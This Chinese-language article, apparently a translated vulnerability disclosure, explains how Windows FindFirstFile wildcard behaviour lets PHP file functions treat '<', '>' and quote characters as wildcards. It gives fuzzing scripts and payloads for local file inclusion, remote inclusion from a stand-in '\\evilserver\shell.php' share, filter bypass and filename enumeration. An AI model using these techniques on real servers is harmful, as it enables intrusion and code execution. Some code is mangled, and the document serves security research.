windows的文件系统机制引发的PHP路径爆破问题分析

这篇文章主要介绍了windows的文件系统机制引发的PHP路径爆破问题分析,需要的朋友可以参考下

1.开场白

此次所披露的是以下网页中提出的问题所取得的测试结果：

<&＃63;php for ($i=0; $i<255; $i++) { $url = '1.ph' . chr($i); $tmp = @file_get_contents($url); if (!empty($tmp)) echo chr($i) . "\r\n"; } &＃63;>

已知1.php存在，以上脚本访问的结果是：

1.php 1.phP 1.ph< 1.ph>

都能得到返回。
前两种能返回结果是总所周知的（因为windows的文件系统支持大小的互转的机制），另外的两种返回引起了我们的注意。
测试php版本：PHP4.9,PHP5.2,PHP5.3,PHP6.0
测试系统：WINXP SP3 X32,WINXP SP2 X64，WIN7,WIN2K3
经测试我们得出的结论是：该漏洞影响所有的windows+php版本

2.深入探查模糊测试的结果

为了继续深入探查关于该bug的信息，我们对demo做了些许修改:

<&＃63;php for ($j=0; $i<256; $j++) { for ($i=0; $i<256; $i++) { $url = '1.p' . chr($j) . chr($i); $tmp = @file_get_contents($url); if (!empty($tmp)) echo chr($j) . chr($i) . "\r\n"; } } &＃63;>

在调试php解释器的过程中，我们将此“神奇”的漏洞归结为一个Winapi 函数FindFirstFile(）所产生的结果((v=vs.85).aspx).更好玩的是，当跟踪函数调用栈的过程中我们发现字符”>”被替换成”&＃63;”，字符”<”被替换成”*”，而符号”（双引号）被替换成一个”.”字符。这在2007年msdn公开的文档中被提及：
但是此bug至今未被任何windows旗下所发行的任何版本修复！
我们要阐明的是，该函数FindFirstFile()在php下的运用远远不至于file_get_contents().关于该bug可以利用的函数我们已经列了如下一表：

#include #include #include void _tmain(int argc, TCHAR *argv[]) { WIN32_FIND_DATA FindFileData; HANDLE hFind; if( argc != 2 ) { _tprintf(TEXT("Usage: %s [target_file]\n"), argv[0]); return; } _tprintf (TEXT("Target file is %s\n"), argv[1]); hFind = FindFirstFile(argv[1], &FindFileData); if (hFind == INVALID_HANDLE_VALUE) { printf ("FindFirstFile failed (%d)\n", GetLastError()); return; } else { _tprintf (TEXT("The first file found is %s\n"), FindFileData.cFileName); FindClose(hFind); } }

当传入参数”c:\bo<”时，成功访问到boot.ini文件。

3.利用方法总结

当调用FindFirstFile()函数时，”<”被替换成”*”,这意味该规则可以使”<”替换多个任意字符，但是测试中发现并不是所有情况都如我们所愿。所以，为了确保能够使”<”被替换成”*”,应当采用”<<”
EXAMPLE:include(‘shell<'); 或者include(‘shell<<'); //当文件夹中超过一个以shell打头的文件时，该执行取按字母表排序后的第一个文件。
当调用FindFirstFile()函数时，”>”被替换成”&＃63;”,这意味这”>”可以替换单个任意字符
EXAMPLE：include(‘shell.p>p'); //当文件中超过一个以shell.p&＃63;p 通配时，该执行取按字母表排序后的第一个文件。
当调用FindFirstFile()函数时，”””(双引号)被替换成”.”
EXAMPLE:include(‘shell”php'); //===>include(‘shell.php');
如果文件名第一个字符是”.”的话，读取时可以忽略之
EXAMPLE：fopen(‘.htacess'); //==>fopen(‘htacess'); //加上第一点中的利用 ==>fopen(‘h<<');
文件名末尾可以加上一系列的/或者\的合集，你也可以在/或者\中间加上.字符，只要确保最后一位为”.”
EXAMPLE：fopen(“config.ini\\.// \/\/\/.”);==> fopen(‘config.ini\./.\.'); ==>fopen(‘config.ini/////.')==>fopen(‘config.ini…..') //译者注：此处的利用我不是很理解，有何作用？截断？
该函数也可以调用以”\\”打头的网络共享文件，当然这会耗费不短的时间。补充一点，如果共享名不存在时，该文件操作将会额外耗费4秒钟的时间，并可能触发时间响应机制以及max_execution_time抛错。所幸的是，该利用可以用来绕过allow_url_fopen=Off 并最终导致一个RFI（远程文件包含）
EXAMPLE：include (‘\\evilserver\shell.php');
用以下方法还可以切换文件的盘名
include(‘\\.\C:\my\file.php\..\..\..\D:\anotherfile.php');
选择磁盘命名语法可以用来绕过斜线字符过滤
file_get_contents(‘C:boot.ini'); //==> file_get_contents (‘C:/boot.ini');
在php的命令行环境下（php.exe）,关于系统保留名文件的利用细节
EXAMPLE:file_get_contents(‘C:/tmp/con.jpg'); //此举将会无休无止地从CON设备读取0字节，直到遇到eof
EXAMPLE:file_put_contents(‘C:/tmp/con.jpg',chr(0×07)); //此举将会不断地使服务器发出类似哔哔的声音

4.更深入的利用方法

除了以上已经展示的方法，你可以用下面的姿势来绕过WAF或者文件名过滤
请思考该例：

<&＃63;php file_get_contents("/images/".$_GET['a'].".jpg"); //or another function from Table 1, i.e. include(). &＃63;>

访问test.php&＃63;a=../a<%00
可能出现两种结果

Warning: include(/images/../a<) [function.include]: failed to open stream:Invalid argument in。。。 Warning: include(/images/../a<) [function.include]: failed to open stream:Permission denied。。

如果是第一种情况，说明不存在a打头的文件，第二种则存在。

此外，有记录显示，有时网站会抛出如下错误：

Warning: include(/admin_h1d3) [function.include]: failed to open stream: Permission denied..

这说明该文件夹下存在一个以上以a打头的文件（夹），并且第一个就是admin_h1d3。